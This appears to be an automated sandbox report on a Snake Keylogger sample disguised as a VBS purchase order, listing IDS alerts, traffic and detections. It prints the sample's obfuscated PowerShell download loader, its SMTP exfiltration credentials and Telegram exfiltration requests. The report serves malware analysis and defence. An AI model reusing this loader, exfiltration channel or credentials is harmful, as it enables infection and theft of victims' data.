o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owpha
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T17:23:52.764154+020028033053Unknown Traffic192.168.2.1049981188.114.96.3443TCP
              2024-10-23T17:23:54.408561+020028033053Unknown Traffic192.168.2.1049983188.114.96.3443TCP
              2024-10-23T17:23:57.816069+020028033053Unknown Traffic192.168.2.1049987188.114.96.3443TCP
              2024-10-23T17:24:01.095815+020028033053Unknown Traffic192.168.2.1049991188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T17:23:50.053333+020028032742Potentially Bad Traffic192.168.2.1049979193.122.6.16880TCP
              2024-10-23T17:23:52.053083+020028032742Potentially Bad Traffic192.168.2.1049979193.122.6.16880TCP
              2024-10-23T17:23:53.756217+020028032742Potentially Bad Traffic192.168.2.1049982193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-23T17:23:44.455140+020028032702Potentially Bad Traffic192.168.2.1049970142.250.185.206443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "daniberto@daniberto.com", "Password": "Fabrica1221.", "Host": "mail.daniberto.com", "Port": "587", "Version": "4.4"}
              Source: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsReversingLabs: Detection: 18%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49980 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49970 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49996 version: TLS 1.2
              Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000005.00000002.1714023781.0000000006DD5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbe source: powershell.exe, 00000005.00000002.1721313369.0000000007F34000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCF45Dh7_2_02DCF2C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCF45Dh7_2_02DCF4AC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCF45Dh7_2_02DCF52F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DCFC19h7_2_02DCF961

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49982 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49979 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49987 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49983 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49981 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49991 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49970 -> 142.250.185.206:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49980 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 23 Oct 2024 15:24:05 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
              Source: msiexec.exe, 00000007.00000002.2618677308.00000000253AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCyP
              Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCyXR
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download
              Source: powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F55712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49970 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49996 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_1516.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap 